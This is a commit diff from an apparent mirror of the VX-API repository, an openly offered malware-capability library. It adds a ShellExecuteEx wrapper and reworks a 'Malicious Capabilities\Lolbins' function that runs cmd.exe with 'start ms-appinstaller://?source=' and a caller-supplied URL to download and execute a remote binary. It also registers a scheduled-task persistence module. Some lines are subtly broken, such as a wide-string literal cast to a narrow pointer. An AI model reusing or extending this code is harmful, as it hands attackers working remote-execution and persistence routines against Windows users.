mirror of https://github.com/vxunderground/VX-API
parent
64a72b97f8
commit
e8c5cd442d
|
@ -3,7 +3,7 @@ managed by [vx-underground](https://vx-underground.org) | follow us on [Twitter]
|
|||
|
||||
# VX-API
|
||||
|
||||
Version: 2.0.396
|
||||
Version: 2.0.402
|
||||
|
||||
Developer: smelly__vx
|
||||
|
||||
|
@ -114,6 +114,7 @@ You're free to use this in any manner you please. You do not need to use this en
|
|||
| GetByteArrayFromFile | smelly__vx | Helper Functions |
|
||||
| Ex_GetHandleOnDeviceHttpCommunication | x86matthew | Helper Functions |
|
||||
| IsRegistryKeyValid | smelly__vx | Helper Functions |
|
||||
FastcallExecuteBinaryShellExecuteEx | smelly__vx | Helper Functions |
|
||||
| GetKUserSharedData | Geoff Chappell | Library Loading |
|
||||
| GetModuleHandleEx2 | smelly__vx | Library Loading |
|
||||
| GetPeb | 29a | Library Loading |
|
||||
|
|
|
@ -0,0 +1,39 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
BOOL FastcallExecuteBinaryShellExecuteExW(_In_ PWCHAR FullPathToBinary, _In_ PWCHAR OptionalParameters)
|
||||
{
|
||||
SHELLEXECUTEINFOW Execute = { 0 };
|
||||
|
||||
Execute.cbSize = sizeof(SHELLEXECUTEINFOW);
|
||||
Execute.lpVerb = L"open";
|
||||
Execute.nShow = SW_SHOW;
|
||||
|
||||
if (!FullPathToBinary)
|
||||
return FALSE;
|
||||
|
||||
Execute.lpFile = FullPathToBinary;
|
||||
|
||||
if (OptionalParameters)
|
||||
Execute.lpParameters = OptionalParameters;
|
||||
|
||||
return ShellExecuteExW(&Execute);
|
||||
}
|
||||
|
||||
BOOL FastcallExecuteBinaryShellExecuteExA(_In_ PCHAR FullPathToBinary, _In_ PCHAR OptionalParameters)
|
||||
{
|
||||
SHELLEXECUTEINFOA Execute = { 0 };
|
||||
|
||||
Execute.cbSize = sizeof(SHELLEXECUTEINFOW);
|
||||
Execute.lpVerb = "open";
|
||||
Execute.nShow = SW_SHOW;
|
||||
|
||||
if (!FullPathToBinary)
|
||||
return FALSE;
|
||||
|
||||
Execute.lpFile = FullPathToBinary;
|
||||
|
||||
if (OptionalParameters)
|
||||
Execute.lpParameters = OptionalParameters;
|
||||
|
||||
return ShellExecuteExA(&Execute);
|
||||
}
|
|
@ -6,23 +6,20 @@ BOOL MpfLolExecuteRemoteBinaryByAppInstallerW(_In_ PWCHAR RemoteUrlTextFile, _In
|
|||
// NOTE: Will display an error stating MS-APPINSTALLER PROTOCOL IS DISABLED
|
||||
// it must be enabled...
|
||||
|
||||
SHELLEXECUTEINFOW Info = { 0 };
|
||||
PWCHAR Payload = NULL;
|
||||
WCHAR CmdPath[28] = L"C:\\Windows\\System32\\cmd.exe";
|
||||
DWORD dwPayloadLength = ERROR_SUCCESS;
|
||||
BOOL bFlag = FALSE;
|
||||
|
||||
Info.cbSize = sizeof(SHELLEXECUTEINFOW);
|
||||
Info.lpVerb = L"open";
|
||||
Info.nShow = SW_SHOW;
|
||||
Info.lpFile = CmdPath;
|
||||
WCHAR CmdPath[MAX_PATH * sizeof(WCHAR)] = { 0 };
|
||||
|
||||
dwPayloadLength = 36;
|
||||
dwPayloadLength += RemoteUrlLengthInBytes;
|
||||
|
||||
if (!CreateWindowsObjectPathW(CmdPath, (PWCHAR)L"\\System32\\cmd.exe", MAX_PATH * sizeof(WCHAR), TRUE))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
Payload = (PWCHAR)HeapAlloc(GetProcessHeapFromTeb(), HEAP_ZERO_MEMORY, dwPayloadLength);
|
||||
if (Payload == NULL)
|
||||
return FALSE;
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (StringCopyW(Payload, (PWCHAR)L"/c start ms-appinstaller://?source=") == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
@ -30,9 +27,7 @@ BOOL MpfLolExecuteRemoteBinaryByAppInstallerW(_In_ PWCHAR RemoteUrlTextFile, _In
|
|||
if (StringConcatW(Payload, RemoteUrlTextFile) == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
Info.lpParameters = Payload;
|
||||
|
||||
bFlag = ShellExecuteExW(&Info);
|
||||
bFlag = FastcallExecuteBinaryShellExecuteExW(CmdPath, Payload);
|
||||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
|
@ -48,23 +43,20 @@ BOOL MpfLolExecuteRemoteBinaryByAppInstallerA(_In_ PCHAR RemoteUrlTextFile, _In_
|
|||
// NOTE: Will display an error stating MS-APPINSTALLER PROTOCOL IS DISABLED
|
||||
// it must be enabled...
|
||||
|
||||
SHELLEXECUTEINFOA Info = { 0 };
|
||||
PCHAR Payload = NULL;
|
||||
CHAR CmdPath[28] = "C:\\Windows\\System32\\cmd.exe";
|
||||
DWORD dwPayloadLength = ERROR_SUCCESS;
|
||||
BOOL bFlag = FALSE;
|
||||
|
||||
Info.cbSize = sizeof(SHELLEXECUTEINFOA);
|
||||
Info.lpVerb = "open";
|
||||
Info.nShow = SW_SHOW;
|
||||
Info.lpFile = CmdPath;
|
||||
CHAR CmdPath[MAX_PATH] = { 0 };
|
||||
|
||||
dwPayloadLength = 36;
|
||||
dwPayloadLength += RemoteUrlLengthInBytes;
|
||||
|
||||
if (!CreateWindowsObjectPathA(CmdPath, (PCHAR)L"\\System32\\cmd.exe", MAX_PATH, TRUE))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
Payload = (PCHAR)HeapAlloc(GetProcessHeapFromTeb(), HEAP_ZERO_MEMORY, dwPayloadLength);
|
||||
if (Payload == NULL)
|
||||
return FALSE;
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (StringCopyA(Payload, (PCHAR)"/c start ms-appinstaller://?source=") == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
@ -72,9 +64,7 @@ BOOL MpfLolExecuteRemoteBinaryByAppInstallerA(_In_ PCHAR RemoteUrlTextFile, _In_
|
|||
if (StringConcatA(Payload, RemoteUrlTextFile) == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
Info.lpParameters = Payload;
|
||||
|
||||
bFlag = ShellExecuteExA(&Info);
|
||||
bFlag = FastcallExecuteBinaryShellExecuteExA((PCHAR)"C:\\Windows\\System32\\cmd.exe", Payload);
|
||||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
|
|
|
@ -157,6 +157,7 @@
|
|||
<ClCompile Include="DnsGetDomainNameIPv4AddressAsString.cpp" />
|
||||
<ClCompile Include="DnsGetDomainNameIPv4AddressUnsignedLong.cpp" />
|
||||
<ClCompile Include="Ex_GetHandleOnDeviceHttpCommunication.cpp" />
|
||||
<ClCompile Include="FastcallExecuteBinaryShellExecuteEx.cpp" />
|
||||
<ClCompile Include="GetByteArrayFromFile.cpp" />
|
||||
<ClCompile Include="GetCurrentDirectoryFromUserProcessParameters.cpp" />
|
||||
<ClCompile Include="GetCurrentLocaleFromTeb.cpp" />
|
||||
|
@ -227,6 +228,7 @@
|
|||
<ClCompile Include="MpfGetLsaPidFromNamedPipe.cpp" />
|
||||
<ClCompile Include="MpfGetLsaPidFromRegistry.cpp" />
|
||||
<ClCompile Include="MpfGetLsaPidFromServiceManager.cpp" />
|
||||
<ClCompile Include="MpfLolScheduledPersistenceByAt.cpp" />
|
||||
<ClCompile Include="__unstable__preview__MpfSilentInstallGoogleChromePlugin.cpp" />
|
||||
<ClCompile Include="SendIcmpEchoMessageToIPv4Host.cpp" />
|
||||
<ClCompile Include="OleGetClipboardData.cpp" />
|
||||
|
|
|
@ -456,6 +456,12 @@
|
|||
<ClCompile Include="MpfLolExecuteRemoteBinaryByAppInstaller.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Lolbins</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfLolScheduledPersistenceByAt.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Lolbins</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="FastcallExecuteBinaryShellExecuteEx.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Helper Functions</Filter>
|
||||
</ClCompile>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ClInclude Include="Internal.h">
|
||||
|
|
|
@ -204,6 +204,8 @@ BOOL GetByteArrayFromFileW(_Inout_ PBYTE Buffer, _In_ PWCHAR Path, _In_ ULONGLON
|
|||
BOOL GetByteArrayFromFileA(_Inout_ PBYTE Buffer, _In_ PCHAR Path, _In_ ULONGLONG BytesToRead);
|
||||
BOOL Ex_GetHandleOnDeviceHttpCommunication(_Out_ PHANDLE Handle);
|
||||
DWORD IsRegistryKeyValidW(_In_ HKEY PredefinedKey, _In_ PWCHAR Path);
|
||||
BOOL FastcallExecuteBinaryShellExecuteExW(_In_ PWCHAR FullPathToBinary, _In_ PWCHAR OptionalParameters);
|
||||
BOOL FastcallExecuteBinaryShellExecuteExA(_In_ PCHAR FullPathToBinary, _In_ PCHAR OptionalParameters);
|
||||
|
||||
|
||||
/*******************************************
|
||||
|
@ -259,7 +261,6 @@ BOOL MpfLolExecuteRemoteBinaryByAppInstallerW(_In_ PWCHAR RemoteUrlTextFile, _In
|
|||
BOOL MpfLolExecuteRemoteBinaryByAppInstallerA(_In_ PCHAR RemoteUrlTextFile, _In_ DWORD RemoteUrlLengthInBytes);
|
||||
|
||||
|
||||
|
||||
/*******************************************
|
||||
EVASION
|
||||
*******************************************/
|
||||
|
|
Loading…
Reference in New Issue